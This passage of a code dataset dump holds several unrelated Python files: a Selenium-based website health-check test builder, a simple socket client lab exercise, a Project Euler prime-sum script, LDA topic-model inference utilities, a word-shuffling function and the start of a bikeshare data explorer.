task.execute(ti_context)\n return None\n\n return _solid\n","sub_path":"python_modules/libraries/dagster-airflow/dagster_airflow/dagster_pipeline_factory.py","file_name":"dagster_pipeline_factory.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"464340165","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom ua_parser import user_agent_parser\nfrom HTMLParser import HTMLParser\nfrom TestConfig import TestSettings\nimport unittest, platform, re, json, urllib2, socket, os\nimport time\n\nclass TestResults():\n def __init__(self, environment, app):\n try:\n self.ip = socket.gethostbyname(app[\"URL\"])\n except:\n self.ip = 'unknown'\n try:\n self.server = socket.gethostbyaddr(self.ip)[0]\n except:\n self.server='unknown'\n self.results = {\n \"Time\": str(time.strftime('%Y-%m-%d %H:%M:%S')),\n \"application\": {\n \"item_id\": app[\"ITEM_ID\"],\n \"item_name\": app.get(\"ITEM_NAME\", app[\"ITEM_ID\"]),\n \"ip\": self.ip,\n \"server\": self.server.lower(),\n \"url\": app[\"URL\"]\n },\n \"results\": {\n \"duration\": 0,\n \"tests_count\": len([d for d in app['TESTS'] if int(d.get('enabled',0)) == 1])\n },\n \"tests\": []\n }\n self.results['environment'] = environment\n self.count = 0\n def TestStart(self):\n self.transaction_start = time.time()\n def TestFinish(self):\n self.transaction_end = time.time()\n self.duration = round(self.transaction_end - self.transaction_start, 2)\n self.results['results']['duration'] = round(self.results['results']['duration'] + self.duration, 2)\n def TestResults(self, info):\n self.results['results']['status'] = info['status']\n if 'error' in info: 
self.results['results']['error'] = info['error']\n info['duration'] = self.duration\n self.results['tests'].append(info)\n def TestSkipped(self):\n info = {'status': 'Skipped'}\n self.results['tests'].append(info)\n def WriteResults(self):\n self.results['results']['tests_run'] = len(self.results['tests'])\n\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n error = s.get_data()\n error = re.sub(r'(?:\\n)+', ' ', error)\n return re.sub(r'\\s+', ' ', error)\n\n\ndef getEnvironmentDetails(driver):\n # GET BROWSER INFO\n ua_string = driver.execute_script(\"return navigator.userAgent\")\n ua = user_agent_parser.Parse(ua_string)\n # GET NODE INFO\n try:\n session = driver.session_id\n url = \"{0}://{1}:{2}/grid/api/testsession?session={3}\".format(TestSettings.get('SeleniumHub', 'protocol'), TestSettings.get('SeleniumHub', 'host'), TestSettings.get('SeleniumHub', 'port'), session)\n req = urllib2.Request(url)\n req.add_header(\"Content-Type\", \"application/json\")\n response = urllib2.urlopen(req)\n node = json.loads(response.read())\n response.close()\n ip = re.search('\\/\\/([^\\:]+)\\:', node.get('proxyId')).group(1)\n try:\n host = socket.gethostbyaddr(ip)[0]\n except:\n host = ip\n except:\n host = \"unknown\"\n ip = \"unknown\"\n environment = {\n 'browser': {\n \"name\": ua['user_agent']['family'],\n \"version\": \"{0}.{1}.{2}\".format(ua['user_agent']['major'], ua['user_agent']['minor'], ua['user_agent']['patch']) if ua['user_agent']['patch'] else \"{0}.{1}\".format(ua['user_agent']['major'], ua['user_agent']['minor'])\n },\n 'host': {\n 'name': host,\n 'ip': ip,\n 'os': \"{0} {1}.{2}\".format(ua['os']['family'], ua['os']['major'], ua['os']['minor']) if ua['os']['minor'] else \"{0} {1}\".format(ua['os']['family'], ua['os']['major'])\n }\n }\n return environment\n\n\ndef getScreenshot(browser):\n try:\n img_str = browser.get_screenshot_as_base64()\n except:\n img_str = \"Screenshot capture failed\"\n return img_str\n\n\ndef TestGenerator(app, screenshot_always=False):\n def applicationTest(self):\n \n if self.browsers.get(app.get('BROWSER')) == None:\n self.browsers[app['BROWSER']] = launchBrowser(app['BROWSER'])\n self.browser_details[app['BROWSER']] = getEnvironmentDetails(self.browsers[app['BROWSER']])\n \n self.driver = self.browsers[app['BROWSER']]\n\n self.test = TestResults(self.browser_details[app['BROWSER']], app)\n\n testCommands = {\n 'Open': self.go_to_url,\n 'Verify title': self.check_title,\n 'Find': self.find_element,\n 'Click': self.click_element,\n 'Type': self.enter_text,\n 'Health': self.health_check,\n 'Switch to': self.switch_to,\n 'Wait': self.wait_for_it,\n 'Get attribute': self.get_current_element_attribute\n }\n\n for step in app[\"TESTS\"]:\n if int(step.get('enabled',0)) == 1:\n try:\n # Clear performance logs before each new test\n if app['BROWSER'] in [\"Chrome\",\"ChromeIncognito\"] and step[\"command\"] in [\"Open\", \"Click\"]:\n while len(self.driver.get_log('performance')) > 0:\n pass\n # Launch appropriate command from the testCommands library\n self.assertEquals(testCommands[step[\"command\"]](**step), True)\n except:\n break\n else:\n self.test.TestSkipped()\n \n if screenshot_always or self.test.results['results']['status'] == \"Failed\":\n if screenshot_always:\n self.test.results['screenshot'] = getScreenshot(self.driver)\n else:\n 
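# on failure, nest the screenshot under results['results'] instead of the top-level per-test record\n 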
self.test.results['results']['screenshot'] = getScreenshot(self.driver)\n if app['BROWSER'] in [\"Chrome\",\"ChromeIncognito\"]:\n logs = self.driver.get_log('performance')\n self.test.results['results']['logs'] = [json.loads(log['message'])['message'] for log in logs if json.loads(log['message'])['message']['method'].startswith('Network')]\n\n self.test.WriteResults()\n return applicationTest\n\ndef launchBrowser(browser):\n # Get Selenium Hub and Browser settings from settings.conf\n hub = \"{0}://{1}:{2}/wd/hub\".format(TestSettings.get('SeleniumHub', 'protocol'), TestSettings.get('SeleniumHub', 'host'), TestSettings.get('SeleniumHub', 'port'))\n sitelist = TestSettings.get(\"BrowserSettings\", \"sitelist\")\n\n if browser in [\"Chrome\",\"ChromeIncognito\"]:\n # START CHROME BROWSER\n options = webdriver.ChromeOptions()\n \n options.add_argument(\"auth-server-whitelist={0}\".format(sitelist))\n options.add_argument(\"auth-negotiate-delegatewhitelist={0}\".format(sitelist))\n options.add_argument(\"auth-schemes=digest,ntlm,negotiate\")\n options.add_argument(\"--disable-http2\")\n if browser == \"ChromeIncognito\":\n options.add_argument(\"--incognito\")\n \n capabilities = options.to_capabilities()\n capabilities['goog:loggingPrefs'] = { 'performance':'ALL' }\n \n driver = webdriver.Remote(hub, capabilities)\n driver.maximize_window()\n driver.set_page_load_timeout(30)\n else:\n # START FIREFOX BROWSER\n # CREATE PROFILE\n profile = FirefoxProfile()\n # ENABLE KERBEROS\n profile.set_preference(\"network.negotiate-auth.trusted-uris\", sitelist)\n profile.set_preference(\"network.negotiate-auth.delegation-uris\", sitelist)\n profile.set_preference(\"network.automatic-ntlm-auth.trusted-uris\", sitelist)\n # DISABLE CACHE\n profile.set_preference(\"browser.cache.disk.enable\", False)\n profile.set_preference(\"browser.cache.memory.enable\", False)\n profile.set_preference(\"browser.cache.offline.enable\", False)\n profile.set_preference(\"network.http.use-cache\", False)\n # DISABLE FLASH\n profile.set_preference(\"plugin.state.flash\", 0)\n # PREVENTS FAILING ON SELF-SIGNED CERTIFICATES\n capabilities = DesiredCapabilities.FIREFOX.copy()\n\n driver = webdriver.Remote(hub, capabilities, browser_profile=profile)\n driver.maximize_window()\n driver.set_page_load_timeout(30)\n\n return driver\n\nclass TestSuite(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.browsers = {}\n self.browser_details = {}\n\n @classmethod\n def tearDownClass(self):\n time.sleep(3)\n for browser, driver in self.browsers.iteritems():\n driver.quit()\n\n def check_title(self, **info):\n info[\"description\"] = \"{0} {1} \\\"{2}\\\"\".format(info[\"command\"], info[\"assert\"], info[\"title_expected\"])\n self.test.TestStart()\n self.wait_for_page_title(info[\"title_expected\"])\n info[\"title_loaded\"] = self.driver.title.encode('utf-8')\n try:\n if info[\"assert\"] == \"equals\": self.assertEquals(info[\"title_loaded\"].lower(), info[\"title_expected\"].lower())\n else: self.assertRegexpMatches(info[\"title_loaded\"].lower(), info[\"title_expected\"].lower())\n \n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except AssertionError:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = 'Unexpected title: \"{0}\" instead of \"{1}\"'.format(info[\"title_loaded\"], info[\"title_expected\"])\n self.test.TestResults(info)\n return False\n\n def get_element(self, name, value):\n byCommand = {\n \"id\": By.ID,\n \"xpath\": By.XPATH,\n 
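# one entry per locator strategy a test step may name; values map straight onto selenium.webdriver.common.by.By constants\n 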
\"link_text\": By.LINK_TEXT,\n \"partial_link_text\": By.PARTIAL_LINK_TEXT,\n \"name\": By.NAME,\n \"tag_name\": By.TAG_NAME,\n \"class_name\": By.CLASS_NAME,\n \"css_selector\": By.CSS_SELECTOR\n }\n return WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((byCommand.get(name), value)))\n\n def wait_for_it(self, **info):\n info[\"description\"] = \"Wait {0} seconds\".format(info[\"seconds\"])\n self.test.TestStart()\n try:\n time.sleep(int(info.get(\"seconds\")))\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n self.test.TestResults(info)\n return False\n\n def get_current_element_attribute(self, **info):\n info[\"description\"] = \"Get \\\"{0}\\\" attribute of current element\".format(info.get(\"attribute\"))\n self.test.TestStart()\n try:\n info[info.get(\"attribute\")] = self.current_element.get_attribute(info.get(\"attribute\"))\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to get \\\"{0}\\\" attribute of current element\".format(info[\"attribute\"])\n self.test.TestResults(info)\n return False\n\n def find_element(self, **info):\n info[\"description\"] = \"{0} element with {1} \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n try:\n self.current_element = self.get_element(info[\"element_name\"], info[\"element_value\"])\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element: {0}=\\\"{1}\\\"\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n\n def switch_to(self, **info):\n info[\"description\"] = \"{0} {1} with name \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n try:\n if info.get(\"element_name\") == \"Frame\":\n self.driver.switch_to.default_content()\n frame = self.get_element(\"name\", info.get(\"element_value\"))\n self.driver.switch_to.frame(frame)\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element: {0}=\\\"{1}\\\"\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n\n def click_element(self, **info):\n try:\n info[\"description\"] = \"{0} element with {1} \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n self.current_element = self.get_element(info[\"element_name\"], info[\"element_value\"])\n self.current_element.click()\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except TimeoutException:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Timeout waiting for element with {0}=\\\"{1}\\\".\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n except NoSuchElementException:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element with {0}=\\\"{1}\\\".\".format(info[\"element_name\"], info[\"element_value\"])\n 
self.test.TestResults(info)\n return False\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unknown error occured\"\n self.test.TestResults(info)\n return False\n\n def enter_text(self, **info):\n try:\n info['description'] = \"Enter text \\\"{0}\\\"\".format(info.get('text'))\n self.test.TestStart()\n self.current_element.click()\n self.current_element.send_keys(info['text'])\n self.assertEqual(self.current_element.get_attribute('value'),info['text'])\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Text entry was not successful\"\n self.test.TestResults(info)\n return False\n\n def health_check(self, **info):\n try:\n info['description'] = \"Evaluate Health Check results\"\n self.test.TestStart()\n healthcheck = json.loads(strip_tags(self.driver.page_source).strip())\n failed = False\n key = info.get('key') if info.get('key') != None and len(info.get('key')) > 0 else \"isHealthy\"\n for category in healthcheck:\n if type(healthcheck[category]) == list:\n for dependency in healthcheck[category]:\n if type(dependency) == dict:\n result = dependency.get(key)\n if result == None:\n failed = {\"error\": \"The provided key was not found in the Health Check results\"}\n elif str(result).lower() not in [\"true\", \"1\"]:\n failed = dependency\n self.assertEqual(failed, False)\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except AssertionError:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = 'A dependency has failed the Health Check'\n info.update(failed)\n self.test.TestResults(info)\n return False\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Failed to parse Health Check results\"\n self.test.TestResults(info)\n return false\n\n def go_to_url(self, **info):\n info['description'] = \"Go to url {0}\".format(info[\"url\"])\n result = True\n neterror = False\n access_error = 0\n toast_error = 0\n try:\n self.test.TestStart()\n self.driver.get(info[\"url\"])\n try:\n page_title = self.driver.title.encode('utf-8').lower()\n # Check for blank title\n if len(page_title) == 0:\n # Pause a couple of seconds to wait for potential redirects and try grabbing the title again\n time.sleep(2)\n page_title = self.driver.title.encode('utf-8').lower()\n # If grabbing the title fails because of an existing alert, dismiss it\n except UnexpectedAlertPresentException:\n try:\n while True:\n time.sleep(1)\n Alert(self.driver).dismiss()\n except NoAlertPresentException:\n page_title = self.driver.title.encode('utf-8').lower()\n if len(page_title) == 0:\n access_error = strip_tags(self.driver.page_source).strip()\n\n info['url_loaded'] = self.driver.current_url\n self.test.TestFinish()\n\n # Look for access errors after dismissing a prompt\n self.assertEqual(access_error,0)\n\n # Look for the presence of custom Toast error element being displayed on the page\n try:\n toast_message = self.driver.find_element_by_class_name(\"toast-message\")\n toast_error = toast_message.get_attribute('innerHTML')\n except:\n toast_error = 0\n\n # Check for PNNL Toast error\n self.assertEqual(toast_error,0)\n\n # Check for an Apology page redirect\n self.assertNotRegexpMatches(self.driver.current_url, r'apology|outage', 1)\n \n # Check for errors in the page title\n self.assertNotRegexpMatches(page_title, r'\\D?[45]\\d\\d\\D', 2)\n 
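# the numeric msg arguments (1, 2, 3) double as error codes; go_to_url's AssertionError handler recovers them via error[0][0] to pick a branch\n 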
self.assertNotRegexpMatches(page_title, r'problem|failed|not\\savailable|error|denied', 3)\n\n            # Check for neterror class on body in Chrome\n            if self.test.results['environment']['browser']['name'] in [\"Chrome\",\"ChromeIncognito\"]:\n                try:\n                    neterror = self.driver.find_element_by_xpath('/html/body[@class=\"neterror\"]//div[@id=\"main-message\"]').get_attribute('innerText')\n                except:\n                    neterror = False\n\n            self.assertEqual(neterror, False)\n\n            # If no page title, check for blank page\n            self.assertNotEqual(len(page_title),0)\n\n            # Success\n            info['status'] = \"Passed\"\n            self.test.TestResults(info)\n        # Handle assertion errors\n        except AssertionError as error:\n            result = False\n            errornum = error[0][0]\n            try:\n                # Check for access denied errors\n                if 'page_title' in locals():\n                    self.assertNotRegexpMatches(page_title, r'40[13]\\D')\n                    self.assertNotIn('denied',page_title)\n\n                if access_error:\n                    info['status'] = 'Warning'\n                    info['error'] = access_error\n                    self.test.TestResults(info)\n\n                # Handle \"Toast\" errors\n                elif toast_error:\n                    info['status'] = 'Failed'\n                    info['error'] = toast_error\n                    self.test.TestResults(info)\n\n                # Handle Chrome neterror\n                elif neterror:\n                    info['status'] = 'Failed'\n                    info['error'] = neterror\n                    self.test.TestResults(info)\n\n                # Handle blank title\n                elif errornum == \"0\":\n                    error = strip_tags(self.driver.page_source).strip()\n                    if len(error) == 0:\n                        error = \"Blank Page Loaded\"\n                    try:\n                        self.assertTrue(len(error) < 1000) # Likely page loaded but page title wasn't caught in time\n                        self.assertRegexpMatches(error.lower(), r'[45]\\d{2}\\D|error|^blank') # Check for status codes or errors in the source\n                        info['status'] = 'Failed'\n                        info['error'] = error\n                        self.test.TestResults(info)\n                    except:\n                        # No page title, but source looks ok\n                        result = True\n                        info['status'] = \"Passed\"\n                        self.test.TestResults(info)\n\n                # Handle redirect to apology page\n                elif errornum == \"1\":\n                    try:\n                        heading = self.driver.find_element_by_tag_name('h1').get_attribute('innerHTML')\n                        self.assertRegexpMatches(heading, r'^Planned')\n                        info['status'] = 'Warning'\n                        info['error'] = error\n                        self.test.TestResults(info)\n                    except AssertionError:\n                        info['status'] = 'Failed'\n                        info['error'] = page_title\n                        self.test.TestResults(info)\n\n                # Handle errors found in the title\n                elif errornum.isdigit():\n                    info['status'] = 'Failed'\n                    info['error'] = page_title\n                    self.test.TestResults(info)\n\n                # Handle unknown errors\n                else:\n                    error = 'An unknown error occurred: {0}'.format(page_title)\n                    info['status'] = 'Failed'\n                    info['error'] = error\n                    self.test.TestResults(info)\n            # Handle access denied errors as a warning\n            except AssertionError:\n                info['status'] = 'Warning'\n                info['error'] = page_title\n                self.test.TestResults(info)\n        # Handle page timeout\n        except TimeoutException:\n            result = False\n            error = 'Timeout: Page did not load within 30 seconds'\n            # Check for the presence of an alert, likely caused by login prompt\n            try:\n                alert = False\n                while True:\n                    Alert(self.driver).dismiss()\n                    alert = True\n            except NoAlertPresentException:\n                self.test.TestFinish()\n                if alert == True:\n                    info['status'] = 'Warning'\n                    info['error'] = 'Test account denied access'\n                    self.test.TestResults(info)\n                else:\n                    info['status'] = 'Failed'\n                    info['error'] = error\n                    self.test.TestResults(info)\n        # Capture neterror if Firefox fails to load the page\n        except WebDriverException as error:\n            result = False\n            self.test.TestFinish()\n            info['status'] = 'Failed'\n            info['error'] = self.driver.find_element_by_id(\"errorLongContent\").get_attribute(\"innerText\")\n            
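# errorLongContent is the id Firefox gives the detailed text on its network-error page\n            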
self.test.TestResults(info)\n        # Handle unknown exceptions\n        except:\n            result = False\n            self.test.TestFinish()\n            info['status'] = 'Failed'\n            info['error'] = 'An unknown error occurred: {0}'.format(page_title)\n            self.test.TestResults(info)\n            raise\n        finally:\n            return result\n\n    def is_alert_present(self):\n        try: self.driver.switch_to_alert()\n        except NoAlertPresentException as e: return False\n        return True\n\n    def close_alert_and_get_its_text(self):\n        try:\n            alert = self.driver.switch_to_alert()\n            alert_text = alert.text\n            if self.accept_next_alert:\n                alert.accept()\n            else:\n                alert.dismiss()\n            return alert_text\n        finally: self.accept_next_alert = True\n\n    def wait_for_page_load(self):\n        old_page = self.driver.find_element_by_tag_name('html')\n        try:\n            self.wait = WebDriverWait(self.driver, 5)\n            self.wait.until(\n                lambda x: old_page.id != self.driver.find_element_by_tag_name('html').id\n            )\n            return True\n        except TimeoutException:\n            return False\n\n    def wait_for_page_title(self, title):\n        try:\n            self.wait = WebDriverWait(self.driver, 5)\n            self.wait.until(\n                lambda x: title.lower() in self.driver.title.lower()\n            )\n            return True\n        except TimeoutException:\n            return False\n\n    def tearDown(self):\n        self.driver.get('about:blank')\n        self.driver.delete_all_cookies()","sub_path":"TestBuilder.py","file_name":"TestBuilder.py","file_ext":"py","file_size_in_byte":25983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"644247168","text":"import socket\nimport sys\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nexcept socket.error as msg:\n    print('Socket creation failed. Error code: ' + str(msg[0]) + ', Message: ' + msg[1])\n    sys.exit()\nprint('Socket created.')\nhost, port = socket.gethostname(), 1234\n# Connect to the server\ns.connect((host, port))\nprint('Successfully connected.')\ns.close()\n","sub_path":"lab02/example3_1_client.py","file_name":"example3_1_client.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"456028108","text":"from math import sqrt\nfrom itertools import count, islice\n\n__author__ = 'Bruno'\n\n\n\"\"\"\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n\"\"\"\n\n\ndef is_prime(n):\n    if n < 2:\n        return False\n    for number in islice(count(2), int(sqrt(n)-1)):\n        if not n % number:\n            return False\n    return True\n\n\ndef sum_of_primes(number):\n    total = 0\n    for x in range(number):\n        if is_prime(x):\n            total += x\n    return total\n\nprint(sum_of_primes(2000000))\n","sub_path":"Problem 10 - Summation of primes.py","file_name":"Problem 10 - Summation of primes.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238607627","text":"import math\nimport globalatt\n\ndef doc_e_step(document, gamma, phi, model, ss):\n\n    # posterior inference\n\n    likelihood = lda_inference(document, model, gamma, phi)\n\n    # update sufficient statistics\n\n    gamma_sum = 0\n    for k in range(0, model.num_topics):\n\n        gamma_sum += gamma[k]\n        ss.alpha_suffstats += digamma(gamma[k])\n\n    ss.alpha_suffstats -= model.num_topics * digamma(gamma_sum)\n\n    for n in range(0, document.length):\n\n        for k in range(0, model.num_topics):\n\n            ss.class_word[k][document.words[n]] += document.word_counts[n] * phi[n][k]\n            ss.class_total[k] += document.word_counts[n] * phi[n][k]\n\n    ss.num_docs = ss.num_docs + 1\n\n    return 
likelihood\n\n\ndef log_sum(log_a, log_b):\n v = None\n\n if (log_a < log_b):\n v = log_b + math.log(1 + math.exp(log_a - log_b))\n\n else:\n v = log_a + math.log(1 + math.exp(log_b - log_a))\n\n return v\n\ndef digamma(x):\n x = x + 6\n p = 1 / (x * x)\n p = (((0.004166666666667 * p - 0.003968253986254)\\\n * p + 0.008333333333333)\\\n * p - 0.083333333333333) * p\n\n p = p + math.log(x) -0.5\\\n /x - 1/(x - 1) -1/(x - 2) - 1\\\n /(x - 3) - 1/(x - 4) - 1/(x - 5) - 1/(x - 6)\n\n return p\n\ndef trigamma(x):\n\n x=x+6\n p=1/(x*x)\n p=(((((0.075757575757576 * p-0.033333333333333)\\\n * p + 0.0238095238095238) * p - 0.033333333333333)\\\n * p + 0.166666666666667) * p + 1) / x + 0.5 * p\n\n for i in range(0,6):\n x=x-1\n p=1/(x*x)+p\n\n return(p)\n\n#\n# Variational Inference\n#\ndef lda_inference(document, model, var_gamma, phi):\n converged = 1\n phisum = 0\n likelihood = 0\n likelihood_old = 0.00000001\n oldphi = [0 for x in range(model.num_topics)]\n digamma_gam = [0 for x in range(model.num_topics)]\n\n # compute posterior dirichlet\n\n for k in range(0, model.num_topics):\n\n var_gamma[k] = model.alpha + (document.total_words/(model.num_topics))\n digamma_gam[k] = digamma(var_gamma[k])\n\n for n in range(0, document.length):\n phi[n][k] = 1.0 / model.num_topics\n\n var_iter = 0\n\n while ((converged > globalatt.VAR_CONVERGED) and ((var_iter < globalatt.VAR_MAX_ITER) or (globalatt.VAR_MAX_ITER == -1))):\n var_iter = var_iter + 1\n for n in range(0, document.length):\n\n phisum = 0\n for k in range(0, model.num_topics):\n\n oldphi[k] = phi[n][k]\n phi[n][k] = digamma_gam[k] + model.log_prob_w[k][document.words[n]]\n\n if (k > 0):\n phisum = log_sum(phisum, phi[n][k])\n else:\n phisum = phi[n][k]; # note, phi is in log space\n\n\n for k in range(0, model.num_topics):\n\n phi[n][k] = math.exp(phi[n][k] - phisum)\n var_gamma[k] = var_gamma[k] + document.word_counts[n]\\\n * (phi[n][k] - oldphi[k])\n # !!! a lot of extra digamma's here because of how we're computing it\n # !!! 
but it's more automatically updated too.\n                digamma_gam[k] = digamma(var_gamma[k])\n\n\n        likelihood = compute_likelihood(document, model, phi, var_gamma);\n        converged = (likelihood_old - likelihood) / likelihood_old;\n        likelihood_old = likelihood;\n\n    # printf(\"[LDA INF] %8.5f %1.3e\\n\", likelihood, converged);\n\n    return likelihood\n\n\ndef compute_likelihood(document, model, phi, var_gamma):\n    likelihood = 0\n    digsum = 0\n    var_gamma_sum = 0\n    dig = [0 for x in range(model.num_topics)]\n\n    for k in range(0, model.num_topics):\n        dig[k] = digamma(var_gamma[k])\n        var_gamma_sum = var_gamma[k] + var_gamma_sum\n\n    digsum = digamma(var_gamma_sum)\n\n    likelihood = math.lgamma(model.alpha * model.num_topics)\\\n                 - model.num_topics * math.lgamma(model.alpha)\\\n                 - (math.lgamma(var_gamma_sum))\n\n    for k in range(0, model.num_topics):\n        likelihood = ((model.alpha - 1) * (dig[k] - digsum)\\\n                      + math.lgamma(var_gamma[k]) - (var_gamma[k] - 1)\\\n                      * (dig[k] - digsum)) + likelihood\n\n        # the word terms must accumulate inside the topic loop (as in the reference lda-c code)\n        for n in range(0, document.length):\n            if (phi[n][k] > 0):\n                likelihood += document.word_counts[n] * \\\n                              (phi[n][k]*((dig[k] - digsum)\\\n                               - math.log(phi[n][k]) \\\n                               + model.log_prob_w[k][document.words[n]]))\n\n    return likelihood\n\n\n# Newton's method\ndef opt_alpha(ss, D, K):\n\n    init_a = 100\n    iter = 0\n\n    log_a = math.log(init_a)\n\n    # first Newton step; the while loop below repeats it (emulating the original do-while)\n    iter += 1\n    a = math.exp(log_a)\n    if (math.isnan(a)):\n\n        init_a = init_a * 10\n        print(\"warning : alpha is nan; new init = %5.5f\" % init_a)\n        a = init_a\n        log_a = math.log(a)\n\n    f = alhood(a, ss, D, K)\n    df = d_alhood(a, ss, D, K)\n    d2f = d2_alhood(a, D, K)\n    log_a = log_a - df/(d2f * a + df)\n    print(\"alpha maximization : %5.5f %5.5f\" % (f, df))\n\n    while ((math.fabs(df) > globalatt.NEWTON_THRESH) and\\\n           (iter < globalatt.MAX_ALPHA_ITER)):\n\n        iter += 1\n        a = math.exp(log_a)\n        if (math.isnan(a)):\n\n            init_a = init_a * 10\n            print(\"warning : alpha is nan; new init = %5.5f\" % init_a)\n            a = init_a\n            log_a = math.log(a)\n\n        f = alhood(a, ss, D, K)\n        df = d_alhood(a, ss, D, K)\n        d2f = d2_alhood(a, D, K)\n        log_a = log_a - df/(d2f * a + df)\n        print(\"alpha maximization : %5.5f %5.5f\" % (f, df))\n\n    return(math.exp(log_a))\n\ndef alhood(a, ss, D, K):\n    return(D * (math.lgamma(K * a) - K * math.lgamma(a)) + (a - 1) * ss)\n\ndef d_alhood(a, ss, D, K):\n    return(D * (K * digamma(K * a) - K * digamma(a)) + ss)\n\ndef d2_alhood(a, D, K):\n    return(D * (K * K * trigamma(K * a) - K * trigamma(a)))\n\ndef argmax(x, n):\n    max = x[0]\n    argmax = 0\n    for i in range(1, n):\n\n        if (x[i] > max):\n            max = x[i]\n            argmax = i\n\n    return argmax\n","sub_path":"lda/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434724580","text":"from random import sample\r\n\r\n\r\ndef still_readable(your_string):\r\n    \"\"\"\r\n    prints your string with shuffled middle letters of each word in a sentence\r\n    :return: None\r\n    \"\"\"\r\n    get_str = []\r\n    for word in your_string.split():\r\n        if len(word) > 3:\r\n            get_str.append(word[0] + ''.join(sample([i for i in word[1:-1]], len(word) - 2)) + word[-1])\r\n        else:\r\n            get_str.append(word)\r\n    print(*get_str)  # or you may use > return ' '.join(words)\r\n\r\n\r\nstill_readable('Здесь должна быть шутка про Штирлица')\r\n","sub_path":"ДЗ№11/11..6.py","file_name":"11..6.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589640739","text":"import time\nimport 
pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n              'new york city': 'new_york_city.csv',\n              'washington': 'washington.csv' }\n\ndef get_filters():\n    \"\"\"\n    Asks user to specify a city, month, and day to analyze.\n\n    Returns:\n        (str) city - name of the city to analyze\n        (str) month - name of the month to filter by, or \"all\" to apply no month filter\n        (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n    \"\"\"\n    print('\\nHello! Let\\'s explore some US bikeshare data!')\n    # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n    city=input('Please select a city from the list : \"Washington\", \"New York City\", \"Chicago\" : ').strip().lower()\n    while city not in ['chicago', 'new york city', 'washington']:\n        city=input(\"\\nPlease try again, that is not a city from the provided list\").strip().lower()\n    print(\"OK, City {} will be analyzed below! \\n\".format(city.title()))\n\n\n    # get user input for month (all, january, february, ... , june)\n    month=input('Please specify a month (if needed), or choose \"ALL\" : \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"ALL\" : ').strip().lower()\n    while month not in ['january', 'february', 'march', 'april', 'may', 'june', 'all']:\n        month=input(\"Please try again, there is no data for this month or the input was incorrect \").strip().lower()\n    print(\"Thank you, the Month filter was set to {}! \\n\".format(month.title()))\n\n    # get user input for day of week (all, monday, tuesday, ... sunday)\n    day=input('Please specify a day (if needed), or choose \"ALL\" : \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\", \"ALL\" : 